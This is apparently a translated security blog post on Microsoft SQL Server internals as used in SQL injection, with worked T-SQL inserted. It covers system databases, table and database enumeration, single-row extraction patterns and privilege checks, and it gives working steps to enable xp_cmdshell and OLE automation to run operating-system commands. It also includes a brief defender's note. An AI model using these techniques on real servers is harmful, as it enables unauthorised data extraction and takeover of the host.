Understanding mssql database

0x00 Foreword

Things have been fairly busy lately, so blog updates have been slow. I originally intended to publish this MSSQL post a few days ago, but because the structure of MSSQL is more complicated and there are more ways to exploit it, I spent the time studying the MSSQL database structure and the various exploitation methods in depth, and did not go into manual injection in detail.

0x01 understand mssql database

The MSSQL referred to here is Microsoft SQL Server.

A relational database management system released by Microsoft. SQL Server is a scalable, high-performance database management system designed for distributed client/server computing. It is tightly integrated with Windows NT and provides an enterprise-level, transaction-based information management solution.
(1) High-performance design that makes full use of the advantages of Windows NT.
(2) Advanced system management: supports Windows graphical management tools and both local and remote administration and configuration.
(3) Strong transaction processing, using various mechanisms to guarantee data integrity.
(4) Support for symmetric multiprocessing, stored procedures and ODBC, and its own SQL dialect (T-SQL). With built-in data replication, powerful management tools, tight Internet integration and an open architecture, SQL Server provides a solid database platform for users, developers and system integrators.

The above is taken from Baidu Encyclopedia.

MSSQL and MySQL differ a great deal: the structure of SQL Server is more complicated, and so are the injection statements. But if the database is running as the sa user at the time of injection, getting a webshell is easy, because MSSQL can enable stored procedures that execute operating system commands directly.

Let's look at the roles of the system databases that ship with MSSQL.


master: stores the information for all system-level objects, including the logins; the passwords of sa and the other logins are stored here as hashes, not in plaintext.
model: the template from which new user databases are created.
msdb: used by SQL Server Agent; it stores all scheduled jobs and tasks.
tempdb: the temporary database. If the number of displayable columns is restricted during injection, data can be written into a table here and then dumped from it. tempdb is cleared every time the service restarts.

Logins that ship with the database:

Logins whose names start with ## are MSSQL internal logins; they are created when the instance is installed, together with the NT (Windows) service logins.


When MSSQL executes an operating system command, it runs under the SQL Server service account, by default NT SERVICE\MSSQLSERVER.


Let's now look at how querying differs from MySQL.

select * from master.dbo.sysobjects where xtype = 'u';

Here master is the database name, followed by a dot, the schema (dbo) and the table name: database.schema.table.

But if we look for this table in the database, we find that it does not exist.

That is because sysobjects is a view, not a real table.

sysobjects is a system (compatibility) view that lists every object created in the database: constraints, defaults, logs, rules, stored procedures, tables, views and so on.

xtype is the object type:
U: table (user-defined table)
V: view
P: stored procedure
X: extended stored procedure
S: system table
TR: trigger
FN: scalar function
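An added example, not from the original post, that puts the sysobjects query and the xtype codes above to work: it lists the user tables in a database, joins syscolumns to get their columns, and shows the TOP 1 / NOT IN pattern used to pull table names one at a time through an injection point that displays a single row (the general form of which the query above is one instance). It assumes a database you have access to; the object names it returns are whatever that database contains.

```sql
-- Added example (not from the original post): enumerating objects through the
-- sysobjects / syscolumns compatibility views. Run it in a database you control;
-- the table and column names returned are whatever that database contains.
USE master;   -- any database works; master is used here because it always exists

-- 1. All user tables (xtype = 'U'), oldest first
SELECT name, id, crdate
FROM   sysobjects
WHERE  xtype = 'U'
ORDER  BY crdate;

-- 2. How many objects of each xtype the database holds
SELECT xtype, COUNT(*) AS objects
FROM   sysobjects
GROUP  BY xtype
ORDER  BY xtype;

-- 3. Columns of every user table: syscolumns joins on the object id,
--    systypes resolves the column's data type name
SELECT o.name AS table_name, c.name AS column_name, t.name AS type_name, c.length
FROM   sysobjects o
JOIN   syscolumns c ON c.id = o.id
JOIN   systypes   t ON t.xusertype = c.xusertype
WHERE  o.xtype = 'U'
ORDER  BY o.name, c.colid;

-- 4. Injection-style extraction when only one row can be displayed:
--    take the first table name, then the next one that is not already known.
--    ORDER BY makes TOP 1 deterministic, so the NOT IN list stays consistent.
SELECT TOP 1 name FROM sysobjects WHERE xtype = 'U' ORDER BY name;
SELECT TOP 1 name FROM sysobjects
WHERE  xtype = 'U'
  AND  name NOT IN (SELECT TOP 1 name FROM sysobjects WHERE xtype = 'U' ORDER BY name)
ORDER  BY name;

-- 5. The same list via the modern catalog views; sysobjects is only kept
--    for backward compatibility, sys.tables is the supported way.
SELECT s.name AS schema_name, t.name AS table_name
FROM   sys.tables  t
JOIN   sys.schemas s ON s.schema_id = t.schema_id
ORDER  BY s.name, t.name;
```

Step 4 is the building block for blind or single-row injection: each time you learn a name you add it to the NOT IN list and the query hands you the next one.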

We can also list every database name:

select * from master..sysdatabases;


sysdatabases is also a view: database metadata in MSSQL is exposed through views as well.

Check whether the web server and the database server are separate hosts (站库分离). host_name() returns the name of the client machine that opened the connection, @@servername the name of the SQL Server, so they are equal only when both run on the same host:

 and (select host_name()) = (select @@servername) 

Query the name of the current database; the same function takes a database id in the parentheses (DB_NAME(1), DB_NAME(2), ...), so by stepping the number you can enumerate all database names:

SELECT DB_NAME();


Now the division of MSSQL permissions:

sa: member of the sysadmin server role, the super administrator
dbo: db_owner, the owner/administrator of a single database
public: ordinary access rights held by every user
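An added example that is not from the original post, covering the server checks in this section: version and identity, the host_name() vs @@servername separation test, the DB_NAME(n) enumeration, and the IS_SRVROLEMEMBER / IS_MEMBER checks that tell you which of the three permission levels (sa, dbo, public) the current login actually holds. All functions used are standard T-SQL; nothing in it is specific to a particular target.

```sql
-- Added example (not from the original post): fingerprint the server,
-- enumerate databases, and find out which of the three privilege levels
-- the current login has. Any login can run this; the results depend on the target.

-- Version and identity
SELECT @@version      AS version,
       @@servername   AS sql_server_name,
       host_name()    AS client_host,   -- the machine that opened this connection
       SYSTEM_USER    AS login_name,
       USER_NAME()    AS db_user,
       DB_NAME()      AS current_db;

-- 站库分离 check: through an injection point the "client" is the web server,
-- so equality means web and database live on the same machine.
SELECT CASE WHEN host_name() = @@servername
            THEN 'web and db on the same host'
            ELSE 'web and db are separated' END AS separation;

-- Privilege level: sa-equivalent (sysadmin), db_owner, or plain public
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin,   -- 1 = sa-level
       IS_MEMBER('db_owner')        AS is_db_owner,   -- 1 = dbo-level in this db
       IS_MEMBER('public')          AS is_public;     -- always 1

-- Databases: via the compatibility view ...
SELECT dbid, name FROM master..sysdatabases ORDER BY dbid;

-- ... and by walking DB_NAME(n), which is what you do through an injection
--     point that only shows one value at a time (DB_NAME(1) is always master).
DECLARE @i int;
SET @i = 1;
WHILE @i <= (SELECT MAX(dbid) FROM master..sysdatabases)
BEGIN
    IF DB_NAME(@i) IS NOT NULL
        PRINT CAST(@i AS varchar(10)) + ': ' + DB_NAME(@i);
    SET @i = @i + 1;
END;
```

IS_SRVROLEMEMBER('sysadmin') returning 1 is the condition under which the stored-procedure command execution in the next section becomes available; with only db_owner or public you are limited to data extraction.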


0x02 stored procedure

A stored procedure is a set of SQL statements in a large database system that performs a specific function; it is stored in the database and, once compiled, stays available until it is removed. The user executes it by specifying its name and supplying parameters (if the stored procedure takes any). Stored procedures are an important object in the database; with very large data volumes, using them can noticeably improve processing efficiency.

In practice we can use stored procedures to execute cmd commands directly.

The commonly used ones are xp_cmdshell and sp_oacreate. sp_oacreate executes the command without returning its output, so the output has to be redirected to a txt file and read back afterwards.

In SQL Server 2000, xp_cmdshell is enabled by default; from SQL Server 2005 onward it is disabled by default and has to be enabled manually.
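An added example, not from the original post, showing the two command-execution paths just described on SQL Server 2005 or later: enabling and calling xp_cmdshell, then running a command through sp_oacreate/sp_oamethod and reading its output back from a file. It assumes sysadmin rights and uses C:\Windows\Temp\out.txt as the output path, which is an assumption; pick a directory the SQL Server service account can write to.

```sql
-- Added example (not from the original post): the two command-execution paths
-- named above. Both need sysadmin (sa-level) rights. The output path
-- C:\Windows\Temp\out.txt is an assumption; use a directory the SQL Server
-- service account can write to.

-- 1. xp_cmdshell: disabled by default since SQL Server 2005, so enable it first.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Output comes back as a result set, one row per line, and the command runs
-- as the SQL Server service account (NT SERVICE\MSSQLSERVER by default).
EXEC master..xp_cmdshell 'whoami';

-- Check whether it is enabled without running it (value_in_use = 1 means on)
SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';

-- 2. sp_oacreate / sp_oamethod: OLE automation, also off by default since 2005.
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

DECLARE @shell int;
DECLARE @hr int;
EXEC @hr = sp_oacreate 'wscript.shell', @shell OUTPUT;
IF @hr <> 0
    RAISERROR('sp_oacreate failed (is OLE automation enabled?)', 16, 1);

-- WScript.Shell.Run hands nothing back to the caller, so redirect the command's
-- output to a file. The last two arguments are window style 0 (hidden) and
-- wait-on-return 1, so the file is complete before the next statement runs.
EXEC sp_oamethod @shell, 'run', NULL, 'cmd.exe /c whoami > C:\Windows\Temp\out.txt', 0, 1;
EXEC sp_oadestroy @shell;

-- 3. Read the file back, here via xp_cmdshell.
EXEC master..xp_cmdshell 'type C:\Windows\Temp\out.txt';

-- Clean up: put both options back to their defaults.
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
```

From the defender's side, the same sp_configure changes are what to alert on: 'xp_cmdshell' or 'Ole Automation Procedures' flipping to 1 on a production instance is rarely legitimate, and sys.configurations is where to audit the current state.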


0x03 End

This article took about 3 hours; noting the time for the record. The next article will cover the various MSSQL injection syntaxes and bypass techniques.

 


Source: www.cnblogs.com/nice0e3/p/12702771.html